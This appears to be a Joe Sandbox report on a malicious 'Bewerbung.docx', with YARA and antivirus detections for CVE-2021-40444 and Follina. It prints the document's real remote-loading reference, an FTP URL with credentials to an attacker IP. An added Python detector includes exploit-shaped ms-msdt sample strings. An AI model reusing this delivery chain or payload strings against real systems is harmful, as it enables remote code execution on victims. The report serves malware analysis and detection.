Source: dump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: Bewerbung.docx | ReversingLabs: Detection: 20%
Source: Bewerbung.docx | Virustotal: Detection: 9%
Source: Bewerbung.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\Bewerbung.docx
Source: Bewerbung.docx | OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$werbung.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmp
Source: classification engine | Classification label: mal88.troj.expl.evad.winDOCX@1/17@0/1
Source: Bewerbung.docx | OLE document summary: title field not present or empty
Source: Bewerbung.docx | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Bewerbung.docx | Initial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
Source: document.xml.rels | Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
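The external relationship above is the whole delivery chain in one string: an `mhtml:` target with an `!x-usc:` suffix, the loading trick the report classifies as CVE-2021-40444, pointing at an FTP server with credentials embedded in the URL, which serves the HTML that the ms-msdt YARA rules then flag as Follina (CVE-2022-30190). The document itself carries no macros (vbamacros = False), so the only on-disk indicator before detonation is this `.rels` entry; do not resolve the target outside a sandbox. The following script is an added triage example, not part of the Joe Sandbox report or of the YARA rules it cites: it rebuilds the checks behind SUSP_Doc_WordXMLRels_May22 (external relationship, `mhtml:`/`!x-usc:`/`.html!` and credentialed FTP) and the string checks behind the ms-msdt rules (`ms-msdt:`, `PCWDiagnostic`, `IT_BrowseForFile=`) in plain Python so a suspicious `.docx` and any HTML it fetched can be checked offline. The regexes, function names and the constructed sample document and HTML are mine; the sample target reuses the shape of the extracted reference with an RFC 5737 documentation address and dummy credentials substituted.

```python
"""Offline triage of a .docx for Follina / CVE-2021-40444-style external references.

Added example, not the Joe Sandbox report's own code. Mirrors the indicator
strings of the cited YARA rules; everything else (regexes, names, samples)
is an assumption made for illustration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PART = "word/_rels/document.xml.rels"
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship-target indicators (names are mine; strings follow the rels rule).
RELS_PATTERNS = {
    "mhtml_prefix": re.compile(r"^mhtml:", re.I),
    "x_usc_chain": re.compile(r"!x-usc:", re.I),
    "html_bang": re.compile(r"\.html!", re.I),
    "ftp_with_creds": re.compile(r"ftp://[^/:@\s]+:[^/@\s]+@", re.I),
}
# Fetched-HTML indicators, mirroring the strings of the ms-msdt rules.
HTML_PATTERNS = {
    "ms_msdt_uri": re.compile(r"ms-msdt:", re.I),
    "pcw_diagnostic": re.compile(r"PCWDiagnostic", re.I),
    "it_browseforfile": re.compile(r"IT_BrowseForFile=", re.I),
}


def external_relationships(docx_bytes: bytes):
    """Yield (rel_id, type, target) for every TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return
        root = ET.fromstring(zf.read(RELS_PART))
    for rel in root.iter(RELS_NS + "Relationship"):
        if rel.get("TargetMode", "").lower() == "external":
            yield rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")


def scan_rels(docx_bytes: bytes):
    """One finding per external target: id, short relationship type, target, matched indicators."""
    findings = []
    for rel_id, rel_type, target in external_relationships(docx_bytes):
        hits = [name for name, rx in RELS_PATTERNS.items() if rx.search(target)]
        findings.append({"id": rel_id, "type": rel_type.rsplit("/", 1)[-1],
                         "target": target, "indicators": hits})
    return findings


def scan_html(html: str):
    """Sorted indicator names found in HTML the document pulled down."""
    return sorted(name for name, rx in HTML_PATTERNS.items() if rx.search(html))


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx (constructed test input) around the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed sample: same shape as the reference in the report, host and
# credentials replaced (192.0.2.10 is a documentation address).
SAMPLE_TARGET = ("mhtml:ftp://user:pass@192.0.2.10/w/smartscreen.html"
                 "!x-usc:ftp://user:pass@192.0.2.10/w/smartscreen.html")
SAMPLE_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{SAMPLE_TARGET}" TargetMode="External"/>
</Relationships>'''
SAMPLE_DOCX = build_docx(SAMPLE_RELS)

# Constructed stand-in for a fetched smartscreen.html; the report only shows a
# comment-padded preview of the real file, so this is not its payload.
SAMPLE_HTML = ('<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force '
               '/param \\"IT_BrowseForFile=...\\"";</script>')

if __name__ == "__main__":
    for finding in scan_rels(SAMPLE_DOCX):
        print(finding)
    print(scan_html(SAMPLE_HTML))
```

Run against a real sample, `scan_rels` takes the raw bytes of the `.docx` and reports each external target with the indicators it trips; an oleObject relationship that is external at all deserves a look, and one that trips `mhtml_prefix` or `x_usc_chain` is the CVE-2021-40444 shape regardless of what the fetched page turns out to do. `scan_html` is for the cached copies Word leaves under Temporary Internet Files, the same files the report's Avira and YARA hits point at.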
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (42 identical entries)
MITRE ATT&CK matrix (the bracketed number is the count the report attaches to techniques matched in this analysis; entries without one are the report's static matrix scaffold):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Exploitation for Client Execution [11]; Scheduled Task/Job; At (Linux)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: Masquerading [1]; Rootkit; Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: File and Directory Discovery [1]; System Information Discovery [1]; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Alternative Protocol [1]; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Non-Standard Port [1]; Application Layer Protocol [1]; Ingress Tool Transfer [1]
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data
Antivirus results for the submitted sample (Source | Detection | Scanner | Label):
Bewerbung.docx | 21% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444
Bewerbung.docx | 10% | Virustotal | (no label)
Bewerbung.docx | 7% | Metadefender | (no label)
Bewerbung.docx | 100% | Avira | HEUR/CVE-2021-40444.Gen
Antivirus results for dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html | 100% | Avira | JS/CVE-2022-30190.G
      No Antivirus matches
      No contacted domains info
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.27.134.11 | unknown | United Kingdom | 34119 | WILDCARD-AS Wildcard UK Limited (GB) | true
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:705530
      Start date and time:2022-09-19 15:34:12 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 40s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Bewerbung.docx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal88.troj.expl.evad.winDOCX@1/17@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .docx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      No simulations
      No context
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28553090913786805
      Encrypted:false
      SSDEEP:48:I34RBgNXaoz6Wcu9c6GlATvxNRUkrMbN4MimN4MiOH:K4LgNrzuuXtLJqpZH
      MD5:2D73449B8D78DAFA350E2652E58AF474
      SHA1:6E3C44B9DA465478D5F6F07145482724E39A41A6
      SHA-256:7F0DC5AE0300037B2B3E97E869C9EA73500D73A3C810A9B022143E04F580BB5C
      SHA-512:3ECF997132E0FCA6D45580A27BB682C28497DA14894C557B2625ED58F43B688CC553F70D59ED9EEFED6D0DFB3D7E4432BDADDEC52DEA553D8FD614CF8772B68A
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zqU2].m.J..3...&.S,...X.F...Fa.q............................].._0.lJ.u!................l.,-A....@....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6720713633463717
      Encrypted:false
      SSDEEP:192:FvMf8tp+QSl8ULTGLkcmExgnq+5Zp+5T9+rP9+:kWp2vo7mExSpgo
      MD5:5D36EB1ABCA971358AC104A295292725
      SHA1:8ED156E62B7C2EF65A0A1252D39E08C49FA48141
      SHA-256:92F5408A7D38930462F4A66DA8C31684D0C2264426AE7D06647A8CA495E307AD
      SHA-512:CC79F3A6B20D7C0469C76A7B62E89C696D2C2E67ECE8D7CF525032D6EA644DCEEEC997B08BCA2FDA2D58EA13090FF6FE7633C544392CDF9AD0660FA4063DF6F8
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.....&uA..%.~eYS,...X.F...Fa.q............................NM..fO.D.*5.<D..........u|..r.!B...Y.f...S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.8916224090210916
      Encrypted:false
      SSDEEP:3:yVlgsRlzRlJBWhEyhWcuUlcvk+g276:yPblzRlJu9u3bg22
      MD5:904561837AE59053F954C3C7828A2A63
      SHA1:0035CEB2E2449BF184BB89A46386CC0CD0201836
      SHA-256:57D90584E6B6FCB107D3BCF20DBD70773A700FC727A18B29C2701235D7F256E4
      SHA-512:829AEA35A9EDF8B61BADC8769A71A4CA22A149C20C2C232F7640D6900427B00F9D2E3205ADCDC803E9BE417DF3F0FA6A2D0058AEF5D70F6DB80A2B55B050A9F3
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.6.1.2.F.5.D.A.A.-.5.4.7.D.-.4.B.9.D.-.9.9.1.1.-.6.A.0.F.5.1.2.8.5.0.D.5.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.2850661294615317
      Encrypted:false
      SSDEEP:96:K/P/WLs0/rkja/XVYN0gqGosqkIQbQv6yq1twIETA0cxQhWtwIETA0cxQhEH:AXWA0HwObQbQnrY
      MD5:AC6D9560CA10163B754804E863E1E5E5
      SHA1:72C08B794D79345CE8E17FA8D5005CF1A67F585E
      SHA-256:B34F7673B5C3F4BED3C0CC8A566207A84C910FDEADC5AC85A32BF9AEC8761580
      SHA-512:A6902E20C87623EB721891CCD33C3296B9F982857A43D50BE8427927FDBC334225AC8AFE82B0783987C69664F54668BEC2CE801288FB9D32B9BDF2F53269E9D8
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z>V.,...B../.'d..S,...X.F...Fa.q..............................c....H.@.....s........0...LK+L.Fd.V.&.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22160280736493287
      Encrypted:false
      SSDEEP:24:I35qNo1LwnM0B34npbWaXHL9kR8b02vlA1WCYDbsMS1yTD24:I35qNo1UrBoZxsG5mkPa1yT
      MD5:64B95E0F62B9F6BB131176B2CF71E0AF
      SHA1:BD9F5A43DDC9F468A3C538AFED622EA1299F5C8E
      SHA-256:E9E42D6B3C84C359B965E508E4F11B78812F5F3306A719811A2CC78C91BE41A1
      SHA-512:E8A9CF3D11B14D5D3B0BD82C8E6443F5FF20043AB87BFBAE9FF69646089FE0BE353D460DAABA36AFE144C64DC39E0E3783F5A4825890BE38E088C43686A9640F
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.....'NN....*./!S,...X.F...Fa.q.............................(*.."C..Ma.../........t%..~zGC........P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.8775027557365576
      Encrypted:false
      SSDEEP:3:yVlgsRlz3lIXHSlM5WDc7kHYzgBYcrQKDjfIRZ276:yPblzCCl1Dc7kEgBxERf22
      MD5:1C0214F722586BE1CFFAF7B15F2BC0FD
      SHA1:493EDB15BDFE8EBE97DB3F14A4E37EC1B5478509
      SHA-256:6510BEDC2A940AD220C76F4E7D5906003C1B257B5CA24AF4245519EFB7C5689F
      SHA-512:730377EC11600B7BBDC08666012A81BD90AF1F1B14BE4AE153134BA144A595E30E534D74E517BE3C09CA738B070539B69B8BB3CCBCBFAC99238B7CF9622E452B
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.9.A.8.D.A.0.0.8.-.E.4.8.F.-.4.9.F.D.-.8.7.D.E.-.F.E.7.9.6.5.1.4.F.8.C.9.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:modified
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:false
      Reputation:low
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
